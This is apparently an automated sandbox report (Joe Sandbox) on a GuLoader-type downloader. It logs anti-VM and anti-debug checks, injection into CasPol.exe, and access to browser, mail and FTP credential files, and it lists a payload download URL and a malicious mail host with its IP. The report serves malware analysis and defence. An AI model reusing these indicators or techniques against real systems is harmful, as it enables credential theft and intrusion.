          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5236 Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsOpenFile.exe
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4AAF1 rdtsc 1_2_02F4AAF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01276BD1 sidt fword ptr [edi+edx*4-54h] 4_2_01276BD1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01271C10 smsw eax 4_2_01271C10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9935
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_0104EAC8 sgdt fword ptr [eax] 4_2_0104EAC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_0040290B FindFirstFileW,1_2_0040290B
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe System information queried: ModuleInformation
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe API call chain: ExitProcess graph end node graph_1-7960
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe API call chain: ExitProcess graph end node graph_1-7804
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210603305.0000000002F60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209535214.00000000007F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
          Source: CasPol.exe, 00000004.00000002.30927389187.000000000135C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209733648.0000000000823000.00000004.00000020.00020000.00000000.sdmp, xcVh7ZmH4Y.exe, 00000001.00000002.26210603305.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0>6
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209406017.00000000007DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

          Anti Debugging

          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Thread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_71031BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71031BFF
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4AAF1 rdtsc 1_2_02F4AAF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4853E mov eax, dword ptr fs:[00000030h] 1_2_02F4853E
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F54EE4 mov eax, dword ptr fs:[00000030h] 1_2_02F54EE4
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4E245 mov ebx, dword ptr fs:[00000030h] 1_2_02F4E245
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F493D1 mov eax, dword ptr fs:[00000030h] 1_2_02F493D1
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F5477E mov eax, dword ptr fs:[00000030h] 1_2_02F5477E
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F56353 mov eax, dword ptr fs:[00000030h] 1_2_02F56353
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4D811 mov eax, dword ptr fs:[00000030h] 1_2_02F4D811
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4E1F3 mov ebx, dword ptr fs:[00000030h] 1_2_02F4E1F3
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4E1F3 mov eax, dword ptr fs:[00000030h] 1_2_02F4E1F3
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4E19D mov eax, dword ptr fs:[00000030h] 1_2_02F4E19D
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F4E189 mov eax, dword ptr fs:[00000030h] 1_2_02F4E189
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01046950 LdrInitializeThunk,4_2_01046950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1100000
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe, Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information

          Source: Yara match, File source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: Yara match, File source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match, File source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTR

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | 211 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
          | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Obfuscated Files or Information | 1 Credentials in Registry | 117 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 21 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | 111 Process Injection | 1 DLL Side-Loading | Security Account Manager | 431 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 371 Virtualization/Sandbox Evasion | LSA Secrets | 371 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | 123 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | 111 Process Injection | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |

          [Behavior graph (ID: 623886, sample: xcVh7ZmH4Y.exe, start date: 10/05/2022, architecture: WINDOWS, score: 100). xcVh7ZmH4Y.exe drops C:\Users\user\AppData\Local\...\System.dll (PE32) and C:\Users\user\AppData\...\AsOpenFile.exe (PE32+) and starts two CasPol.exe processes. One CasPol.exe contacts mail.comansi.com (77.246.191.210, Spain) and drive.google.com (142.250.181.238, United States) and starts conhost.exe.]

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | xcVh7ZmH4Y.exe | 38% | Virustotal | |
          | xcVh7ZmH4Y.exe | 23% | Metadefender | |
          | xcVh7ZmH4Y.exe | 39% | ReversingLabs | Win32.Downloader.GuLoader |
          | xcVh7ZmH4Y.exe | 100% | Avira | TR/Inject.CT |

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | C:\Users\user\AppData\Local\Temp\AsOpenFile.exe | 0% | Metadefender | |
          | C:\Users\user\AppData\Local\Temp\AsOpenFile.exe | 0% | ReversingLabs | |
          | C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll | 0% | Metadefender | |
          | C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll | 0% | ReversingLabs | |

          No Antivirus matches
          No Antivirus matches

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe |
          | http://DynDns.comDynDNS | 0% | Avira URL Cloud | safe |
          | https://SqvSXVgUZh6rJgTP37.com | 0% | Avira URL Cloud | safe |
          | https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | Avira URL Cloud | safe |
          | http://crl.F | 0% | Avira URL Cloud | safe |
          | http://mail.comansi.com | 0% | Avira URL Cloud | safe |
          | http://SckyfZ.com | 0% | Avira URL Cloud | safe |

          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | mail.comansi.com | 77.246.191.210 | true | true | | unknown |
          | drive.google.com | 142.250.181.238 | true | false | | high |
          | googlehosted.l.googleusercontent.com | 142.250.185.193 | true | false | | high |
          | doc-10-70-docs.googleusercontent.com | unknown | unknown | false | | high |

          | Name | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|
          | https://doc-10-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=download | false | | high |

          | Name | Source | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|
          | https://doc-10-70-docs.googleusercontent.com/G | CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high |
          | http://127.0.0.1:HTTP/1.1 | CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
          | http://DynDns.comDynDNS | CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | https://SqvSXVgUZh6rJgTP37.com | CasPol.exe, 00000004.00000002.30952228522.000000001D9B3000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952931628.000000001DA1D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.27106953909.000000001C631000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952729098.000000001DA0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30953010911.000000001DA23000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | https://doc-10-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17 | CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927389187.000000000135C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high |
          | https://drive.google.com/w | CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
          | https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | https://doc-10-70-docs.googleusercontent.com/=( | CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmp | false | | high |
          | https://drive.google.com/ | CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
          | http://crl.F | xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown |
          | http://mail.comansi.com | CasPol.exe, 00000004.00000002.30953405175.000000001DA52000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952819183.000000001DA13000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
          | https://doc-10-70-docs.googleusercontent.com/R | CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmp | false | | high |
          | http://nsis.sf.net/NSIS_ErrorError | xcVh7ZmH4Y.exe | false | | high |
          | https://doc-10-70-docs.googleusercontent.com/ | CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmp | false | | high |
          | http://SckyfZ.com | CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |

                                    | IP | Domain | Country | ASN | ASN Name | Malicious |
                                    |---|---|---|---|---|---|
                                    | 142.250.181.238 | drive.google.com | United States | 15169 | GOOGLEUS | false |
                                    | 142.250.185.193 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false |
                                    | 77.246.191.210 | mail.comansi.com | Spain | 43578 | BITNAPbitNAPDatacenter01BarcelonaES | true |

                                    | IP |
                                    |---|
                                    | 192.168.11.1 |

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:623886
                                    Start date and time: 10/05/2022 22:08:41 (2022-05-10 22:08:41 +02:00)
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 14s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:xcVh7ZmH4Y.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:17
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@6/10@3/4
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 25.2% (good quality ratio 24.7%)
                                    • Quality average: 88%
                                    • Quality standard deviation: 21.7%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 132
                                    • Number of non-executed functions: 76
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.54.122.82
                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    | Time | Type | Description |
                                    |---|---|---|
                                    | 22:11:15 | API Interceptor | 2701x Sleep call for process: CasPol.exe modified |

                                    | Match | Associated Sample Name / URL | Detection | Context |
                                    |---|---|---|---|
                                    | 77.246.191.210 | MX-LC-20210809-P00286 JUSTIFICANTE.exe | malicious | |
                                    | | JUSTIFICANTE DE PAGO CF.exe | malicious | |
                                    | | 813641BENTELERdeM#U00e9xicoSAdeCV202110193434322.exe | malicious | |

                                    | Match | Associated Sample Name / URL | Detection | Context |
                                    |---|---|---|---|
                                    | BITNAPbitNAPDatacenter01BarcelonaES | jew.arm7 | malicious | 185.74.81.100 |
                                    | | MX-LC-20210809-P00286 JUSTIFICANTE.exe | malicious | 77.246.191.210 |
                                    | | JUSTIFICANTE DE PAGO CF.exe | malicious | 77.246.191.210 |
                                    | | 813641BENTELERdeM#U00e9xicoSAdeCV202110193434322.exe | malicious | 77.246.191.210 |
                                    | | lessie.arm7 | malicious | 185.74.81.125 |

                                    | Match | Associated Sample Name / URL | Detection |
                                    |---|---|---|
                                    | C:\Users\user\AppData\Local\Temp\AsOpenFile.exe | xcVh7ZmH4Y.exe | malicious |
                                    | C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll | xcVh7ZmH4Y.exe | malicious |
                                    | | 3GJ6S3Kwnb.exe | malicious |
                                    | | 3GJ6S3Kwnb.exe | malicious |
                                    | | file.exe | malicious |
                                    | | file.exe | malicious |
                                    | | Bayaran Balik Cukai Terlebih Bayar.exe | malicious |
                                    | | Bayaran Balik Cukai Terlebih Bayar.exe | malicious |
                                    | | 7RsSycKaNc.exe | malicious |
                                    | | 7RsSycKaNc.exe | malicious |
                                    | | potwierdzenie wplaty.exe | malicious |
                                    | | potwierdzenie wplaty.exe | malicious |
                                    | | Docs advice copy.exe | malicious |
                                    | | Docs advice copy.exe | malicious |
                                    | | Transferencia desde ING.exe | malicious |
                                    | | Transferencia desde ING.exe | malicious |
                                    | | shipping document.exe | malicious |
                                    | | shipping document.exe | malicious |
